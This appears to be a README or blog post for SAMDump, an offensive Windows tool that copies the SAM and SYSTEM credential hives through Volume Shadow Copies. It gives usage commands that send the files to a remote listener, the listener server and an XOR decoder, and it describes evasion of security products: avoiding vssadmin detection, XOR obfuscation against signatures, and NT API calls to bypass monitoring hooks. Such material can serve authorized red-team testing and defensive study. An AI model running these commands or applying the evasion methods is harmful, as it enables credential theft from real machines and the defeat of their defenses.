SAMDump - Stealthy SAM Dumping Using VSS and NTAPIs

SAMDump extracts Windows SAM and SYSTEM files using Volume Shadow Copy Service (VSS) with multiple exfiltration options and XOR obfuscation.

Repository: https://github.com/ricardojoserf/SAMDump

Implemented features:

  • Lists Volume Shadow Copies using VSS and creates one if necessary

  • Extracts SAM and SYSTEM files from the Shadow Copy

  • Uses NT API calls for file operations (NtCreateFile, NtReadFile, NtWriteFile)

  • Supports XOR encoding for obfuscation

  • Exfiltration methods: Local save or Network transfer

It requires to run as Administrator, and if created the Shadow Copy is automatically deleted after ~5 minutes.


Usage

SAMDump.exe [OPTIONS]

Options:
  --save-local [BOOL]    Save locally (default: false)
  --output-dir DIR       Output directory (default: C:\Windows\tasks)
  --send-remote [BOOL]   Send remotely (default: false)
  --host IP              Host for remote sending (default: 127.0.0.1)
  --port PORT            Port for remote sending (default: 7777)
  --xor-encode [BOOL]    XOR Encode (default: false)
  --xor-key KEY          Enable XOR with specified key (default: SAMDump2025)
  --disk DISK            Disk for shadow copy (default: C:\)
  --help                 Show this help

Save locally without encoding:

SAMDump.exe --save-local --output-dir "C:\temp"

img1

Save locally with XOR encoding:

SAMDump.exe --save-local --xor-encode --xor-key "SAMDump2025"

img2

Send to remote server with XOR encoding and the default key:

SAMDump.exe --send-remote --host 192.168.1.72 --port 1234 --xor-encode

img3


Server to receive the files

server.py is a Python server that receives files over network with automatic XOR decoding and filename formatting:

python server.py [OPTIONS]

Options:
  --host HOST     IP address to listen on (default: 0.0.0.0)
  --port PORT     Port to listen on (default: 7777)
  --xor-key KEY   Key for XOR decoding (optional)

Listener on specific interface and port with XOR key:

python server.py --host 192.168.1.72 --port 1234 --xor-key "SAMDump2025"

img4

The filename contains the IP address and the date, so you can send the files from different systems, automating the process.


Script to decode the files

xor-decoder.py is a Python script to decode XOR-encoded SAM and SYSTEM files locally:

python xor-decoder.py [OPTIONS]

Options:
  --sam SAM         Path to encoded SAM file (required)
  --system SYSTEM   Path to encoded SYSTEM file (required)
  --xor-key KEY     XOR key for decoding (default: SAMDump2025)
  --output-dir DIR  Output directory for decoded files (default: ./decoded)

Decode with default key:

python xor-decoder.py --sam sam.txt --system system.txt

img5

Decode with custom key and output directory:

python xor-decoder.py --sam sam.txt --system system.txt --xor-key "MyKey" --output-dir ./results

img6


Motivation

I wanted to automate this process and most Windows I find run VSS, but security solutions detect the use of vssadmin to create Shadow Copies and extract these files because it is an old, well-known technique.

This tool extracts the files without writing to the target filesystem when using remote transfer mode and XOR-encoding offers basic obfuscation to evade signature-based detection (even when using remote mode).

Plus, it leverages NT API calls to bypass some monitoring and user-mode API hooks.


NT API Integration

The tool employs NT system calls instead of standard Windows API functions, which might bypass some user-mode API hooks commonly monitored:

  • NtCreateFile and NtReadFile: Used to open a handle and read the bytes of the SAM and SYSTEM files in the Shadow Copy

  • NtWriteFile: Used to save the files locally

  • It uses a custom GetProcAddress implementation to resolve function addresses using only NtReadVirtualMemory


Written on November 14, 2025